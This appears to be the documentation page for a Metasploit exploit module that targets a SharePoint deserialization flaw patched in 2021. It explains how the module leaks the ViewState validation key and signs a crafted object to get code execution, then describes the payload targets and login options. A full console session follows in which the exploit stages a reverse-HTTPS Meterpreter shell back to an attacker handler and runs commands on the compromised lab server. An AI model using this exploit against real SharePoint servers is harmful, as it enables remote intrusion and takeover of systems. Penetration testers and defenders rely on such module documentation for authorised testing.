3.6 KiB
Vulnerable Application
Description
The EditingPageParser.VerifyControlOnSafeList method fails to properly validate user supplied data. This can be
leveraged by an attacker to leak sensitive information in rendered-preview content. This module will leak the ViewState
validation key and then use it to sign a crafted object that will trigger code execution when deserialized.
The check method is unauthenticated and will determine whether or not the target service is vulnerable via the version number. The exploit however requires authentication in order to trigger the vulnerability. See the documentation for the HttpUsername option below for details on the account.
This vulnerability was patched in May of 2021.
Tested against SharePoint 2019 and SharePoint 2016, both on Windows Server 2016.
Setup
Follow Microsoft's documentation.
Verification Steps
Targets
Windows Command
This executes a Windows command.
Windows Dropper
This uses a Windows dropper to execute code.
PowerShell Stager
This uses a PowerShell stager to execute code.
Options
HttpUsername
Set this to the SharePoint username. This user must have the SPBasePermissions.ManageLists permission on the targeted
SharePoint site. By default, SharePoint users may create their own site where they will have this permissions however
this action is not automatically performed by this module.
HttpPassword
Set this to the SharePoint password.
VALIDATION_KEY
Set this to the ViewState validation key if you have it.
COOKIE
Set this to a SharePoint cookie if you have one. This is primarily useful for form auth.
SP_LIST
Set this to the title of any valid SPlist on the targeted SharePoint site. The Documents SPlist is typically a safe
option. The available SPlist items can be seen listed on the /_layouts/15/viewlsts.aspx page.
Scenarios
SharePoint 2019 on Windows Server 2016
msf6 exploit(windows/http/sharepoint_unsafe_control) > set RHOSTS 192.168.159.46
RHOSTS => 192.168.159.46
msf6 exploit(windows/http/sharepoint_unsafe_control) > set VHOST shrpnt2019
VHOST => shrpnt2019
msf6 exploit(windows/http/sharepoint_unsafe_control) > set HttpUsername aliddle
HttpUsername => aliddle
msf6 exploit(windows/http/sharepoint_unsafe_control) > set HttpPassword Password1
HttpPassword => Password1
msf6 exploit(windows/http/sharepoint_unsafe_control) > check
[*] 192.168.159.46:80 - The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
msf6 exploit(windows/http/sharepoint_unsafe_control) > exploit
[*] Started HTTPS reverse handler on https://192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
[*] Leaking the ViewState validation key...
[+] ViewState validation key: F894731BF335C2DAB04D70773B5F6BE55EE2C4052B671EE3C6785497A3D29A94
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
[*] https://192.168.159.128:8443 handling request from 192.168.159.46; (UUID: a5re3jes) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 127.0.0.1) at 2021-06-08 15:08:59 -0400
meterpreter > getuid
Server username: SHRPNT\SharePoint
meterpreter > sysinfo
Computer : SHRPNT2019
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : SHRPNT
Logged On Users : 11
Meterpreter : x64/windows
meterpreter >